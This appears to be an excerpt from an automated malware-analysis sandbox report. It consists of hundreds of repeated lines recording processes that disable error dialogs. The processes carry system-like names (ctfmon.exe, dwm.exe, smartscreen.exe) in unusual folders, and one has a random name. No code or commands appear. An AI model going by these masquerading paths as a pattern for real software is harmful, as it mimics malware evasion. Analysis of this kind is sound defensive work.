                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
